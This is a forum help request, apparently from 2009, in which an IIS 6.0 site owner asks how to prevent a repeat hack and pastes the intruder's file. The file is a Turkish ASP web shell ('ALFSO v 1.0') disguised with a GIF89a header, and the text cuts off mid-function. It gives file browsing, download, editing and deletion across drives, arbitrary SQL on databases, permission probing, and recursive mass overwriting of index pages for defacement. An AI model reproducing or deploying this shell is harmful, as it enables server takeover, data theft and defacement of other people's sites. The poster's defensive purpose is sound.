PeopleSoft Adoption Made Smooth & Simple!
On-The-Job Training Is made Intuitive & Easy With WalkMe's On-Screen Guidance Tool. Claim Your Free WalkMe Account Now
Course Of The Month
3 days, 12 hours left to enrollBecome a Premium Member and unlock a new, free course in leading technologies each month.
Solved
Web Site Hack
Posted on 2009-05-08
I am running IIS 6.0 with SQL Server. My site has been hacked. I fixed, but need to know how to keep this from happening again. Thank you for your help
GIF89a;
<%
'if request("rootx") = "alfonso" then
'response.cookies("yes") = "1"
'response.cookies("yes").expires = now+352
'end if
'if not request.cookies("yes") = "1" then
'response.end()
'end if
Server.ScriptTimeOut = 7200
Fullpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
FilePath = mid(Fullpath,InStrRev(Fullpath,"\")+1)
FolderPath = Left(Fullpath,InStrRev(Fullpath,"\"))
const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"
const karakter1="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
const karakter2="abcdefghijklmnopqrstuvwxyz"
const karakter3="0123456789"
const karakter4="!@#$%^&*()-_+=~`[]{}|\:;<>,.?/"
mail_array = array("yahoo","hotmail","mynet","gmail","hacker") 'özel mailler yaratmak için, SPAM dan kaçýrmak için. Securityi aþmak için by ALFONSO
uzanti_array = array("com","net","biz","org","gov","br","info")
yasak_array = array("ALFONSO","CYBERWARRIOR","CYBERSECURITY","GAL","GAL","TURK")
Dim FSO
Set FSO = CreateObject("Scripting.FileSystemObject")
konum = Trim(request("konum"))
mode = request("mode")
FolderPath2 = request("FolderPath2")&"\"
islem = request("islem")
del = request("del")
file = request("file")
folder = request("folder")
table = Request("table")
inject1 = Request("inject1")
inject2 = Request("inject2")
inject3 = Request("inject3")
inject4 = Request("inject4")
inject5 = Request("inject5")
cmdkod = Request("cmdkod")
hacked = request("hacked")
Path = request("Path")
url = request("url")
count = request("count")
size = request("size")
dbname = request("dbname")
dbkadi = request("dbkadi")
dbsifre = request("dbsifre")
alfonsosql = request("alfonsosql")
sec = request("sec")
Usermd5 = request("Usermd5")
ara1 = request("ara1")
ara2 = request("ara2")
k1 = request("k1")
k2 = request("k2")
k3 = request("k3")
k4 = request("k4")
waiting = request("waiting")
coding = request("coding")
dizi = request("dizi")
Usersmd5 = request("Usersmd5")
salt = request("salt")
hash2 = request("hash2")
hash3 = request("hash3")
hash4 = request("hash4")
hash5 = request("hash5")
hash6 = request("hash6")
hash7 = request("hash7")
hash8 = request("hash8")
hash9 = request("hash9")
hash10 = request("hash10")
if konum = "" then
konum = FolderPath
else
FolderPath = konum
end if
if mode = "1" then
FolderPath = request.form("remote")
konum = request.form("remote")
end if
nolist = False
popup = False
if mode = "2" or mode = "3" or mode = "7" or mode = "8" or mode = "16" or mode = "17" or mode = "18" or mode = "19" or mode = "20" or mode = "21" or mode = "22" or mode = "24" or mode = "25" or mode = "26" or mode = "27" or mode = "28" or mode = "29" or mode = "30" or mode = "31" or mode = "32" or mode = "33" or mode = "36" or mode = "38" or mode = "39" or mode = "40" or mode = "41" or mode = "42" or mode = "43" or mode = "44" or mode = "45" or mode = "99" then
popup = True
end if
if mode = "6" then
Response.Buffer=True
Set Fil = FSO.GetFile(file)
Response.contenttype="application/force-download"
Response.AddHeader "Cache-control","private"
Response.AddHeader "Content-Length", Fil.Size
Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
Response.BinaryWrite readBinaryFile(Fil.path)
Set f = Nothing: Set Fil = Nothing
response.end
end if
response.write "<title>ALFSO v 1.0 ALFONSO'nun fso'su // CW</title>"
response.write "<meta http-equiv=""Content-Type"" content=""text/html; charset=iso-8859-9"">"
response.write "<style>"
response.write "body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}"
response.write ".k1{font-family:Wingdings; font-size:15px;}"
response.write ".k2{font-family:Webdings; font-size:15px;}"
response.write "td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}"
response.write "a{color:#EEEEEE;text-decoration:none;}"
response.write "a:hover{color:#40a0ec;}"
response.write "a:visited{color:#EEEEEE;}"
response.write "a:visited:hover{color:#40a0ec;}"
response.write "input,"
response.write ".kbrtm,"
response.write "select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}"
response.write "textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}"
response.write "</style>"
%>
<script language=javascript>
function NewWindow(mypage, myname, w, h, scroll) {
var winl = (screen.width - w) / 2;
var wint = (screen.height - h) / 2;
winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
win = window.open(mypage, myname, winprops)
if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
}
function klasorkopya(yol){
NewWindow(yol,"",400,130,"no");
}
function mass(yol){
NewWindow(yol,"",555,600,"yes");
}
function tester(yol){
NewWindow(yol,"",600,600,"yes");
}
function klasor(yol){
NewWindow(yol,"",420,450,"yes");
}
function cmd(yol){
NewWindow(yol,"",550,555,"no");
}
function biz(yol){
NewWindow(yol,"",550,700,"no");
}
function cmdhelp(yol){
NewWindow(yol,"",500,230,"no");
}
function somur(yol){
NewWindow(yol,"",420,220,"yes");
}
</script>
<script language="JavaScript">
function openInMainWin(winLocation){
window.opener.location.href = winLocation
window.opener.focus();
}
</script>
<%
sub KlasorOku
on error resume next
Set f = FSO.GetFolder(FolderPath)
Set fc = f.SubFolders
For Each f1 In fc
Response.Write "<table class=""kbrtm"" ><tr><td><font class=""k1""><a title="" Dizini Kopyala & Taþý "" href='"&FilePath&"?mode=2&konum="&FolderPath&"\"&f1.Name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a title="" Dizini Sil "" href='"&FilePath&"?mode=4&konum="&FolderPath&"&del="&FolderPath&"\"&f1.Name&"&Time="&time&"'>û</a> 1</font><font size=2><b><a title="" Dizinin içine Gir "" href='"&FilePath&"?konum="&FolderPath&"\"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b></td></tr></table>"
Response.Flush
Next
call hata
end sub
sub DosyaOku
on error resume next
Set f = FSO.GetFolder(FolderPath)
Set fc = f.Files
For Each f1 In fc
dosyaAdi = f1.name
num = InStrRev(dosyaAdi,".")
uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
downStr = "<a title=""Dosyayý Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&f1.Name&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&f1.path&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayý Kopyala & Taþý "" href='"&FilePath&"?mode=7&file="&f1.path&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Deðiþtir "" href='"&FilePath&"?mode=16&file="&f1.path&"&islem="&f1.name&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
response.Write "<table class=""kbrtm"" ><tr><td><font size=2>"
select case uzanti
case "mdb"
Response.Write "<a title="" Db in içini Görmek , SQl sorgu yapmak için Týkla by alfonso ;) "" href='"&FilePath&"?mode=13&file="&FolderPath&"\"&f1.Name&"&konum="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M "&downStr&"</font></td></tr></table>"
case "asp"
Response.Write "<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&FolderPath&"\"&f1.Name&"&konum="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayý Editlemek için Týkla by ALFONSO :) "" href='"&FilePath&"?mode=10&file="&f1.path&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font></td></tr></table>"
case "jpg","gif"
Response.Write "<a title="" Resmi Görmek için Týkla "" href='"&FilePath&"?mode=12&file="&FolderPath&"\"&f1.Name&"&konum="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>¢</font><font face=wingdings size=4> "&downStr&"</font></td></tr></table>"
case else
Response.Write "<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&FolderPath&"\"&f1.Name&"&konum="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a title="" Dosyayý Editlemek için Týkla by ALFONSO :) "" href='"&dosyaPath&"?mode=10&file="&f1.path&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font></td></tr></table>"
end select
Next
call hata
end sub
sub Suruculer
for each drive_ in FSO.Drives
Response.Write "<tr bgcolor=""#3a3a3a""><td height=""20"" class=""kbrtm"">"
Response.Write "<a href="" "&FilePath&"?konum="&drive_.DriveLetter&":/ "">"
if drive_.Drivetype=1 then Response.write " <font class=""k1""><</font> Disket Sürücü [" & drive_.DriveLetter & ":] <a title=""Sürücü Detayý Ýçin Týkla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&konum="&konum&"""><font class=""k1"">Ä</font></a>"
if drive_.Drivetype=2 then Response.write " <font class=""k1"">;</font> Sabit Disk [" & drive_.DriveLetter & ":] <a title=""Sürücü Detayý Ýçin Týkla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&konum="&konum&"""><font class=""k1"">Ä</font></a>"
if drive_.Drivetype=3 then Response.write " <font class=""k1"">;</font> Çýkarýlabilir Disk [" & drive_.DriveLetter & ":] <a title=""Sürücü Detayý Ýçin Týkla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&konum="&konum&"""><font class=""k1"">Ä</font></a>"
if drive_.Drivetype=4 then Response.write " <font class=""k2"">³</font> Cd-Rom [" & drive_.DriveLetter & ":] <a title=""Sürücü Detayý Ýçin Týkla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&konum="&konum&"""><font class=""k1"">Ä</font></a>"
Response.Write "</a></td></tr>"
next
Response.Write "<tr bgcolor=""#3a3a3a""><td class=""kbrtm"" height=""20""> <a href="" "&FilePath&" ""><font class=""k2"">H</font> Local Path </a></td></tr>"
end sub
Sub SurucuInfo
'Disk Alanýný Gösterir - Coded By ALFONSO ;)
DriveSpace = Request("dspace")
If Not DriveSpace = "" Then
on error resume next
Set driveObject = FSO.GetDrive(DriveSpace)
D1 = Left((driveObject.FreeSpace/(driveObject.TotalSize*1.0))*100.0, 4)
if err <> 0 then
response.write "<center><br> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Disk Hazýr deðil !!!! :( <font face=Wingdings size=5>N</font></font> <br></center>"
else
D2 = Left(((driveObject.TotalSize - driveObject.FreeSpace)/(driveObject.TotalSize*1.0))*100.0, 4)
D3 = 100
D1a = 110 - D1
D2a = 110 - D2
D3a = 110 - D3
Response.Write "<br><center><table cellspacing=0 cellpadding=0><tr><td style='background-color: #121212;' colspan=4 align=center class=kbrtm><b>Disk :</b> " & driveObject.DriveLetter & "</td></tr><tr><td class=kbrtm width=60> </td><td class=kbrtm width=100 align=center><b>Boþ Alan</b></td><td class=kbrtm width=100 align=center><b>Kullanýlan Alan</b></td><td class=kbrtm width=100 align=center><b>Toplam Alan</b></td></tr><tr><td height=110 class=kbrtm> </td><td class=kbrtm align=center><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D1a&"></td></tr><tr height="&D1&"><td bgcolor=#009900 width=2></td><td bgcolor=#33CC00 width=15></td><td bgcolor=#009900 width=2></td></tr></table></td><td class=kbrtm align=center valign=bottom><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D2a&"></td></tr><tr height="&D2&"><td bgcolor=#990000 width=2></td><td bgcolor=#CC0000 width=15></td><td bgcolor=#990000 width=2></td></tr></table></td><td class=kbrtm align=center valign=bottom><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D3a&"></td></tr><tr height="&D3&"><td bgcolor=#006699 width=2></td><td bgcolor=#0088CC width=15></td><td bgcolor=#006699 width=2></td></tr></table></td></tr><tr><td class=kbrtm> <b>Yüzde :</b></td><td class=kbrtm align=center>"&D1&" %</td><td class=kbrtm align=center>"&D2&" %</td><td class=kbrtm align=center>"&D3&" %</td></tr><tr><td class=kbrtm> <b>Boyut :</b></td><td class=kbrtm align=center> " & FormatNumber(driveObject.FreeSpace / 1048576) & " MB</td><td class=kbrtm align=center> " & FormatNumber(driveObject.TotalSize / 1048576) - FormatNumber(driveObject.FreeSpace / 1048576) & " MB</td><td class=kbrtm align=center> " & FormatNumber(driveObject.TotalSize / 1048576) & " MB</td></tr></table></center><br><br><br>"
end if
Set driveObject = Nothing
End If
end sub
sub yetkino(str)
response.write "<td class=""kbrtm""> <b><font color=#FBE1D7>"&str&" :</font></b> <font color=#FE7A84 class=""k1"">û</font> </td>"
End Sub
sub yetkiyes(str)
response.write "<td class=""kbrtm""> <b><font color=#FAFEDE>"&str&" :</font></b> <font color=#C6FCBE class=""k1"">ü</font> </td>"
end Sub
sub Yetki
on error resume next
Set f = FSO.GetFolder(FolderPath)
if err<>0 then
yetkino("Okuma")
yetkino("Yazma")
yetkino("Silme")
else
yetkiyes("Okuma")
on error resume next
Set MyFile = FSO.CreateTextFile(FolderPath & "test.alfonso", True)
MyFile.write "alfonso Was Here... =) Yazma - Okuma Testi için"
set MyFile = Nothing
if err<>0 then
yetkino("Yazma")
yetkino("Silme")
else
yetkiyes("Yazma")
on error resume next
FSO.DeleteFile FolderPath & "test.alfonso",true
if err<>0 then
yetkino("Silme")
else
yetkiyes("Silme")
end if
end if
end if
set f = nothing
end sub
Sub olmadi(str)
response.write "<br><center><font color=#FE7A84> <font face=Wingdings size=5>N</font> "&str&" :( <font face=Wingdings size=5>N</font> </font></center>"
End Sub
Sub oldu(str)
response.write "<br><center><font color=#C6FCBE> <font face=Wingdings size=5>N</font> "&str&" ;) Tebrikler Ýþlem Baþarýyla Gerçekleþtirildi.. by alfonso <font face=Wingdings size=5>N</font> </font></center>"
End Sub
Sub tablo12(str)
response.write "<tr bgcolor=""#121212""><td align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
Sub tablo30(str)
response.write "<tr bgcolor=""#303030""><td class=""kbrtm"" align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
Sub tablo12L(str)
response.write "<tr bgcolor=""#121212""><td align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
Sub tablo12O(str)
response.write "<tr bgcolor=""#121212""><td class=""kbrtm"" align=""center"" width=""100%"" valign=""middle"">"&str&"</td></tr>"
End Sub
sub Hata
if err<>0 then
Response.Write "<center><font color=red size=2>Hata : "&err.Description&"</font></center>"
end if
end sub
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
End Function
Sub SQL_menu_by_alfonso
response.write "<center><table width=""450"">"
response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""dosyacopypaste"" action='"&FilePath&"' type=""post"">"
response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
tablo30(" <b>SQL Ýnjection Merkezi</b>")
tablo30(" ")
tablo12("<font color=#FE7A84> Kullanabilmeniz için SQL kouýtlarý bilmeniz gerek !!! <br> <font face=Wingdings size=5>N</font> Aksi Halde ASP DOsyaý Kitlenir. Cevap veremez. Server a Zarar verir. <font face=Wingdings size=5>N</font></font>")
tablo12(" Select <input value=""select"" type=""radio"" name=""islem"" checked> <input size=""60"" type=""text"" name=""inject1"" value='Select * from "&table&"'>")
tablo12(" Delete <input value=""delete"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject2"" value='Delete from "&table&"'>")
tablo12(" Insert <input value=""insert"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject3"" value='Insert into "&table&" () values ()'>")
tablo12(" Update <input value=""update"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject4"" value='Update "&table&" set .. where ..'>")
tablo12(" Diðer <input value=""diger"" type=""radio"" name=""islem"" > <input size=""60"" type=""text"" name=""inject5"" value='Drop "&table&"'>")
tablo12("<input name=""mode"" type=""hidden"" value='15' ><input name=""sec"" type=""hidden"" value='"&sec&"' ><input name=""alfonsosql"" type=""hidden"" value='"&alfonsosql&"' ><input name=""file"" type=""hidden"" value='"&file&"' ><input name=""konum"" type=""hidden"" value='"&FolderPath&"' ><input name=""table"" type=""hidden"" value='"&table&"' ><br><input value="" SQL Ýnj. Uygula "" type=""Submit""><br><br>")
if alfonsosql = "" then
tablo12("<a href='"&FilePath&"?mode=13&file="&file&"&konum="&FolderPath&"&Time="&time&"'> .... ::: Tablolara Geri Dön ::: .... </a><br>")
else
tablo12("<a href='"&FilePath&"?mode=34&file="&file&"&konum="&konum&"&alfonsosql="&alfonsosql&"&islem=1&Time="&time&"'> .... ::: Tablolara Geri Dön ::: .... </a><br>")
end if
response.write "</form></table></td></tr></table><br></center>"
response.write "<table align=""center"" class=""kbrtm""><tr><td align='center'> <a href='"&FilePath&"?mode=36&konum="&konum&"&Time="&time&"' onclick=""klasor(this.href);return false;""><b>...:::::: SQL Komut Yardým - Kullaným Klavuzu by alfonso ::::::...</b></a> </td></tr></table><br>"
end sub
Sub SQL_by_alfonso(sqlkonum,sqlkomut)
on error resume next
Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = sqlkonum
objConn.Open
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Baðlantýnýz Saðlanamadý !!! by alfonso :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
else
on error resume next
objRcs.Open sqlkomut,objConn, adOpenKeyset , , adCmdText
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> SQL Ýnjection Komutunuzda HATA var. ( Bilmiyorsan KullanMA :) ) by alfonso <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
else
Response.Write "<center><table class=""kbrtm"" border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
for i=0 to objRcs.Fields.count-1
Response.Write "<td><font color=black><b> "&objRcs.Fields(i).Name&" </font></td>"
next
Response.Write "</tr>"
do while not objRcs.EOF
Response.Write "<tr class=""kbrtm"">"
for i=0 to objRcs.Fields.count-1
Response.Write "<td class=""kbrtm"">"&Replace(objRcs.Fields(i).Value,"<","<")&" </td>"
next
Response.Write "</tr>"
objRcs.MoveNext
loop
Response.Write "</table><br></center>"
end if
end if
end sub
Sub MSSQL_by_alfonso(sqlkonum,sqlkomut)
on error resume next
Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Open sqlkonum
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Baðlantýnýz Saðlanamadýý !!! by alfonso :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
else
on error resume next
objRcs.Open sqlkomut,objConn, adOpenKeyset , , adCmdText
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> SQL Ýnjection Komutunuzda HATA var. ( Bilmiyorsan KullanMA :) ) by alfonso <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
else
Response.Write "<center><table class=""kbrtm"" border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
for i=0 to objRcs.Fields.count-1
Response.Write "<td><font color=black><b> "&objRcs.Fields(i).Name&" </font></td>"
next
Response.Write "</tr>"
do while not objRcs.EOF
Response.Write "<tr class=""kbrtm"">"
for i=0 to objRcs.Fields.count-1
Response.Write "<td class=""kbrtm"">"&objRcs.Fields(i).Value&" </td>"
next
Response.Write "</tr>"
objRcs.MoveNext
loop
Response.Write "</table><br></center>"
end if
end if
end sub
sub Tablolama()
on error resume next
if alfonsosql = "" then
if sec = "mssql" then
alfonsosql = "PROVIDER=SQLOLEDB;DATA SOURCE="&file&";UID="&dbkadi&";PWD="&dbsifre&";DATABASE="&dbname&""
else
alfonsosql = "Driver={MySQL ODBC 3.51 Driver};Server="&file&";Database="&dbname&";Uid="&dbkadi&";Pwd="&dbsifre&""
end if
end if
Set objConn = Server.CreateObject("ADODB.Connection")
Set objADOX = Server.CreateObject("ADOX.Catalog")
objConn.Open alfonsosql
objADOX.ActiveConnection = objConn
if err = 0 then
Response.Write "<center><b><font size=3>Tablolar</font></br><br>"
response.write "<table class=""kbrtm"">"
For Each table in objADOX.Tables
If table.Type = "TABLE" Then
Response.Write "<tr><td><font face=wingdings size=5>4</font> <a href='"&FilePath&"?mode=35&alfonsosql="&alfonsosql&"&table="&table.Name&"&konum="&konum&"&time="&time&"'>"&table.Name&"</a></td></tr>"
End If
Next
response.write "</table>"
response.write "</center>"
else
Call MSSQL_Form
yazortaa("<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Server ile baðlantý Saðlanamadý !!! girilen Deðerler yanlýþ .. :( by alfonso <font face=Wingdings size=5>N</font> </font><br><br></center>")
end if
end Sub
sub MSSQL_Form()
response.write "<center><table align=""center"" ><tr><td>"
yazorta("<b> MY-MS SQL Server Connection 2.0 by alfonso </b>")
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'><form name=""MssqlbyE_j_d?er"" method='post' action='"&FilePath&"?mode=34&konum="&konum&"&Time="&time&"'><input name='sec' checked value='mssql' type='radio'> <b>MsSQL</b> - <input name='sec' value='mysql' type='radio'> <b>MySQL</b></td></tr><tr><td>Server Adý & IP : <input name='file' value='"&file&"' style='color=#C6FCBE' size=35 type='text'></td></tr><tr><td> DB Adý : <input name='dbname' style='color=#C6FCBE' type='text' value='"&dbname&"' size=44></td></tr><tr><td> KAdý : <input name='dbkadi' style='color=#C6FCBE' value='"&dbkadi&"' type='text' size=46></td></tr><tr><td> Þifre : <input name='dbsifre' style='color=#C6FCBE' type='text' value='"&dbsifre&"' size=46></td></tr><td align='center'> <input name='islem' type='hidden' value='1'><input name='gooo' value=' ..:: Baðlan ::..' type='Submit'></td></tr></form></table>"
yazorta("TÜm haklarý Saklýdýr by alfonso =)")
response.write "</td></tr></table></center>"
end sub
sub MassCopier(hedef)
on error resume next
Set cloner = fso.GetFile(hacked)
cloner.Copy hedef,true
Set cloner = Nothing
end sub
sub MassCreater(yer,savsak)
on error resume next
Set savsakcom = FSO.CreateTextFile(yer, True)
savsakcom.write savsak
Set savsakcom = Nothing
end sub
sub MassAttack2(yer,ej,svk)
if hash3 = "ok" then
yer = yer&"\"&svk
end if
on error resume next
if not islem = "ozel" then
if hash9 = "copy" then
MassCopier(yer&"\index.html")
MassCopier(yer&"\index.htm")
MassCopier(yer&"\index.asp")
MassCopier(yer&"\index.cfm")
MassCopier(yer&"\index.php")
MassCopier(yer&"\default.html")
MassCopier(yer&"\default.htm")
MassCopier(yer&"\default.asp")
MassCopier(yer&"\default.cfm")
MassCopier(yer&"\default.php")
else
Call MassCreater(yer&"\index.html",ej)
Call MassCreater(yer&"\index.htm",ej)
Call MassCreater(yer&"\index.asp",ej)
Call MassCreater(yer&"\index.cfm",ej)
Call MassCreater(yer&"\index.php",ej)
Call MassCreater(yer&"\default.html",ej)
Call MassCreater(yer&"\default.htm",ej)
Call MassCreater(yer&"\default.asp",ej)
Call MassCreater(yer&"\default.cfm",ej)
Call MassCreater(yer&"\default.php",ej)
end if
else
if hash9 ="copy" then
MassCopier(yer&"\"&inject1)
else
Call MassCreater(yer&"\"&inject1,ej)
end if
end if
a = Replace(FilePath&"?konum="&yer&"&Time="&time,"\","/")
If Err.Number = 0 Then
response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&yer&" </a><font color=#C6FCBE> OK !! <font class=""k1"">ü</font></td></tr></table>"
else
response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&yer&" </a><font color=#FE7A84> Noo :( !! <font class=""k1"">û</font></td></tr></table>"
end if
Err.Number = 0
Response.Flush
end sub
sub MassAttack(yer,ej,svk)
dim fastalfonso
on error resume next
Set f = FSO.GetFolder(yer)
Set fc = f.SubFolders
For Each f1 In fc
if hash3 = "ok" then
fastalfonso = f1.path&"\"&svk
else
fastalfonso = f1.path
end if
if not islem = "ozel" then
if hash9 = "copy" then
MassCopier(fastalfonso&"\index.html")
MassCopier(fastalfonso&"\index.htm")
MassCopier(fastalfonso&"\index.asp")
MassCopier(fastalfonso&"\index.cfm")
MassCopier(fastalfonso&"\index.php")
MassCopier(fastalfonso&"\default.html")
MassCopier(fastalfonso&"\default.htm")
MassCopier(fastalfonso&"\default.asp")
MassCopier(fastalfonso&"\default.cfm")
MassCopier(fastalfonso&"\default.php")
else
Call MassCreater(fastalfonso&"\index.html",ej)
Call MassCreater(fastalfonso&"\index.htm",ej)
Call MassCreater(fastalfonso&"\index.asp",ej)
Call MassCreater(fastalfonso&"\index.cfm",ej)
Call MassCreater(fastalfonso&"\index.php",ej)
Call MassCreater(fastalfonso&"\default.html",ej)
Call MassCreater(fastalfonso&"\default.htm",ej)
Call MassCreater(fastalfonso&"\default.asp",ej)
Call MassCreater(fastalfonso&"\default.cfm",ej)
Call MassCreater(fastalfonso&"\default.php",ej)
end if
else
if hash9 = "copy" then
MassCopier(fastalfonso&"\"&inject1)
else
Call MassCreater(fastalfonso&"\"&inject1,ej)
end if
end if
a = Replace(FilePath&"?konum="&fastalfonso&"&Time="&time,"\","/")
If Err.Number = 0 Then
response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&fastalfonso&" </a><font color=#C6FCBE> OK !! <font class=""k1"">ü</font></td></tr></table>"
else
response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&fastalfonso&" </a><font color=#FE7A84> Noo :( !! <font class=""k1"">û</font></td></tr></table>"
end if
Err.Number = 0
Response.Flush
if islem = "brute" then
Call MassAttack(f1.path&"\",ej,svk)
end if
Next
end sub
Sub tester(yer)
on error resume next
Set f = FSO.GetFolder(yer)
Set fc = f.SubFolders
For Each f1 In fc
a = Replace(FilePath&"?konum="&f1.path&"&Time="&time,"\","/")
response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&f1.path&" </a> "
Response.Flush
Err.Number = 0
on error resume next
Set f = FSO.GetFolder(f1.path)
if Err.Number <> 0 then
response.write " <b><font color=#FBE1D7>Oku :</font></b> <font color=#FE7A84 class=""k1"">û</font> "
else
response.write " <b><font color=#FAFEDE>Oku :</font></b> <font color=#C6FCBE class=""k1"">ü</font> "
end if
set f = nothing
Err.Number = 0
Response.Flush
on error resume next
Set MyFile = FSO.CreateTextFile(f1.path & "test.alfonso", True)
MyFile.write " ALFONSO Was Here "
set MyFile = Nothing
if Err.Number <> 0 then
response.write " <b><font color=#FBE1D7>Yaz :</font></b> <font color=#FE7A84 class=""k1"">û</font> "
else
response.write " <b><font color=#FAFEDE>Yaz :</font></b> <font color=#C6FCBE class=""k1"">ü</font> "
end if
set f = nothing
Err.Number = 0
Response.Flush
on error resume next
FSO.DeleteFile f1.path & "test.alfonso",true
if Err.Number <> 0 then
response.write " <b><font color=#FBE1D7>Sil :</font></b> <font color=#FE7A84 class=""k1"">û</font> "
else
response.write " <b><font color=#FAFEDE>Sil :</font></b> <font color=#C6FCBE class=""k1"">ü</font> "
end if
set f = nothing
Err.Number = 0
Response.Flush
response.write "</td></tr></table>"
Response.Flush
Call tester(f1.path)
Next
end sub
Sub arama(yer)
on error resume next
Set f = FSO.GetFolder(yer)
Set fc = f.SubFolders
For Each f1 In fc
Set f2 = FSO.GetFolder(f1.path)
Set fc2 = f2.Files
For Each f12 In fc2
if InStr(Ucase(f12.name),Ucase(hacked)) > 0 then
downStr = "<table align=""center""><tr><td align=""center"" class=""kbrtm""><font class=""k2""><a href='"&FilePath&"?mode=6&file="&f12.path&"&konum="&konum&"&Time="&time&"'> Í </a></font>"
if Ucase(hacked)="MDB" then
Response.Write downStr&"<font class=""k1"" ><a href='"&FilePath&"?mode=5&konum="&konum&"&del="&f12.path&"&Time="&time&"'> û </a></font> - <a href='"&dosyapath&"?mode=13&file="&f12.path&"&konum="&konum&"&Time="&time&"'>"&f12.path&" ["&f12.size&"]"&"</a></b><br></td></tr></table>"
i=i+1
else
